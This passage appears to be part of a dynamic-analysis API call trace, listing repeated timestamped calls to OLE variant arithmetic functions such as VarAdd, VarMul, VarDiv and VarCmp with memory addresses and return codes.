(in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.441] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.441] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.441] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.441] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.441] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.441] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.441] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.441] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.441] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.441] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.442] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.442] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.442] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.442] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.442] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.442] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.442] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.442] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.442] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.442] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.442] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.442] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.442] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.442] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.442] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.442] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.442] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.442] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.442] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.442] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.442] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.442] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.442] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.442] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.442] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.443] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.443] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.443] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.443] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.443] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.443] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.443] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.443] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.443] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.443] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.443] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.443] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.443] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.443] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.443] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.443] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.443] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.443] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.443] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.443] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.443] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.443] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.443] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.443] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.443] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.443] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.443] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.443] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.443] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.443] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.443] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.443] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.443] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.443] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.443] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.444] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.444] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.444] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.444] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.444] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.444] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.444] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.444] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.444] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.444] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.444] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.444] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.444] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.444] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.444] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.444] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.444] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.444] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.444] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.444] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.444] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.444] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.444] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.444] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.444] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.444] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.444] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.444] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.445] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.445] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.445] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.445] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.445] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.445] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.445] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.445] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.445] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.445] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.445] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.445] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.445] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.445] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.445] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.445] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.445] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.445] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.445] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.445] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.445] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.445] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.445] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.445] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.445] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.445] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.445] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.445] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.445] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.446] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.446] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.446] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.446] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.446] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.446] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.446] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.446] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.446] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.446] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.446] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.446] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.446] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.446] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.446] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.446] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.446] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.446] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.446] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.446] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.446] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.446] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.446] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.446] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.446] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.446] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.446] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.446] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.446] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.447] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.447] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.447] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.447] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.447] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.447] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.447] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.447] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.447] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.447] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.447] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.447] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.447] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.447] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.447] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.447] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.447] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.447] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.447] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.447] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.447] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.447] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.447] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.447] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.447] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.447] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.447] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.447] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.447] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.447] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.448] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.448] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.448] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.448] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.448] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.448] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.448] VarMul (in: pvarLeft=0x18fbac, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.448] VarDiv (in: pvarLeft=0x18fb88, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.448] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.448] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.448] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.448] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.448] VarAnd (in: pvarLeft=0x18fb0c, pvarRight=0x18faac, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.448] VarCmp (pvarLeft=0x18fbac, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.448] VarMul (in: pvarLeft=0x18fbcc, pvarRight=0x18facc, pvarResult=0x18fb1c | out: pvarResult=0x18fb1c) returned 0x0 [0069.448] VarDiv (in: pvarLeft=0x18fbac, pvarRight=0x18fabc, pvarResult=0x18fb0c | out: pvarResult=0x18fb0c) returned 0x0 [0069.448] VarInt (in: pvarIn=0x18fb0c, pvarResult=0x18fafc | out: pvarResult=0x18fafc) returned 0x0 [0069.448] VarAdd (in: pvarLeft=0x18fb1c, pvarRight=0x18fafc, pvarResult=0x18faec | out: pvarResult=0x18faec) returned 0x0 [0069.448] VarAnd (in: pvarLeft=0x18faec, pvarRight=0x18faac, pvarResult=0x18fadc | out: pvarResult=0x18fadc) returned 0x0 [0069.448] VarCmp (pvarLeft=0x18fb88, pvarRight=0x18facc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0069.448] VarMul (in: 